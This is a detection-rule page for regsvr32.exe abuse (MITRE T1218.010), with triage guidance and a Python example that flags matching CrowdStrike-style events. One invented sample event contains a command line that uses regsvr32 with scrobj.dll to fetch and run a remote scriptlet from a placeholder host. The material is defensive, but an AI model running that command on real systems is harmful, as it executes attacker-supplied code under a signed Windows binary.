regsvr32 Execution

Anvilogic Forge

Summary
This detection rule identifies executions of `regsvr32.exe`, a legitimate, Microsoft-signed Windows binary used to register and unregister COM DLLs, which adversaries abuse to load malicious DLLs or scriptlets under a trusted process name. This is a Living off the Land technique: a native system tool is repurposed so that the malicious activity inherits the binary's signature and reputation. MITRE ATT&CK classifies it under Defense Evasion as System Binary Proxy Execution: Regsvr32 (T1218.010).

The rule consumes CrowdStrike endpoint detection and response (EDR) process data and matches process creation events on Windows hosts whose image is `regsvr32.exe`, looking back over the last two hours. Because `regsvr32.exe` is also run routinely by software installers, a bare execution match is noisy; analysts should triage hits on the command line and parent process, for example `/i:` pointing at a remote URL together with `scrobj.dll` (scriptlet execution), a module path under a user-writable directory, a module argument whose extension is not `.dll` or `.ocx`, or a parent such as an Office application or script host.

Several threat actors, including Kimsuky, TA551, and ransomware-affiliated groups such as Conti and Black Basta, have used this binary, so capturing these process creation events gives security teams an early signal for investigating possible proxy execution in the environment.
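The following is an added example, not Anvilogic's rule: it runs the detection described above (Windows process creation events whose image is `regsvr32.exe`, within a two-hour window) over constructed CrowdStrike-style `ProcessRollup2` records and attaches the triage reasons an analyst would check first. The field names `ImageFileName`, `CommandLine`, `ParentBaseFileName`, `event_platform` and `timestamp` are assumed to follow the Falcon event schema; every event value below is invented.

```python
"""Added example (not Anvilogic's rule): regsvr32.exe execution detection over
constructed CrowdStrike-style ProcessRollup2 events, plus triage heuristics."""
import re
from datetime import datetime, timedelta, timezone

# Fixed "now" so the look-back window is deterministic in this demo.
NOW = datetime(2024, 2, 9, 12, 0, tzinfo=timezone.utc)
WINDOW = timedelta(hours=2)


def _epoch_ms(minutes_ago):
    """Falcon timestamps are epoch milliseconds carried as strings."""
    return str(int((NOW - timedelta(minutes=minutes_ago)).timestamp() * 1000))


# Constructed sample events; field names assumed from the Falcon schema.
SAMPLE_EVENTS = [
    {"event_simpleName": "ProcessRollup2", "event_platform": "Win", "ComputerName": "WS01",
     "timestamp": _epoch_ms(10), "ParentBaseFileName": "msiexec.exe",
     "ImageFileName": "\\Device\\HarddiskVolume2\\Windows\\System32\\regsvr32.exe",
     "CommandLine": 'regsvr32.exe /s "C:\\Program Files\\Vendor\\vendorlib.dll"'},
    {"event_simpleName": "ProcessRollup2", "event_platform": "Win", "ComputerName": "WS02",
     "timestamp": _epoch_ms(5), "ParentBaseFileName": "WINWORD.EXE",
     "ImageFileName": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://example.invalid/p.sct scrobj.dll"},
    {"event_simpleName": "ProcessRollup2", "event_platform": "Win", "ComputerName": "WS03",
     "timestamp": _epoch_ms(180), "ParentBaseFileName": "cmd.exe",
     "ImageFileName": "\\Device\\HarddiskVolume2\\Windows\\System32\\regsvr32.exe",
     "CommandLine": "regsvr32.exe /s C:\\Users\\bob\\AppData\\Local\\Temp\\update.txt"},
    {"event_simpleName": "ProcessRollup2", "event_platform": "Win", "ComputerName": "WS01",
     "timestamp": _epoch_ms(1), "ParentBaseFileName": "explorer.exe",
     "ImageFileName": "\\Device\\HarddiskVolume2\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
]

REMOTE_SCRIPTLET = re.compile(r"/i:\s*\"?(?:https?|ftp)://", re.I)
USER_WRITABLE = re.compile(r"\\(?:Users|ProgramData|Temp|Public)\\", re.I)
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe"}


def is_regsvr32_event(ev):
    """Core rule: Windows process creation whose image basename is regsvr32.exe."""
    image = ev.get("ImageFileName", "").rsplit("\\", 1)[-1].lower()
    return (ev.get("event_simpleName") == "ProcessRollup2"
            and ev.get("event_platform") == "Win"
            and image == "regsvr32.exe")


def in_window(ev, now=NOW, window=WINDOW):
    """Two-hour look-back, matching the rule's scheduling window."""
    ts = datetime.fromtimestamp(int(ev["timestamp"]) / 1000, tz=timezone.utc)
    return now - window <= ts <= now


def triage_reasons(ev):
    """Command-line and parent heuristics that separate installer noise from abuse."""
    cmd = ev.get("CommandLine", "")
    parent = ev.get("ParentBaseFileName", "").lower()
    reasons = []
    if REMOTE_SCRIPTLET.search(cmd):
        reasons.append("remote scriptlet via /i:")
    if "scrobj.dll" in cmd.lower():
        reasons.append("scrobj.dll scriptlet host")
    if USER_WRITABLE.search(cmd):
        reasons.append("module in user-writable path")
    # A module argument whose extension is not .dll/.ocx is a common masquerade.
    for tok in re.findall(r'"[^"]*"|\S+', cmd)[1:]:
        tok = tok.strip('"')
        if not tok.startswith("/") and not tok.lower().endswith((".dll", ".ocx")):
            reasons.append(f"non-DLL module argument {tok}")
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {parent}")
    return reasons


def detect(events, now=NOW):
    """Return every in-window regsvr32 execution with its triage reasons."""
    hits = []
    for ev in events:
        if is_regsvr32_event(ev) and in_window(ev, now):
            hits.append({"host": ev["ComputerName"], "cmdline": ev["CommandLine"],
                         "reasons": triage_reasons(ev)})
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit["host"], "|", hit["cmdline"], "|",
              "; ".join(hit["reasons"]) or "no triage flags")
```

Run as written, the installer-driven registration on WS01 matches the rule but carries no triage flags, the Word-spawned `/i:http://...` plus `scrobj.dll` execution on WS02 matches with three reasons, the WS03 event falls outside the two-hour window, and the `rundll32.exe` event never matches the core rule. The triage layer is the part worth tuning per environment; the core match is intentionally broad, as the rule summary describes.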
Categories
  • Endpoint
  • Windows
Data Sources
  • Process
ATT&CK Techniques
  • T1218.010
Created: 2024-02-09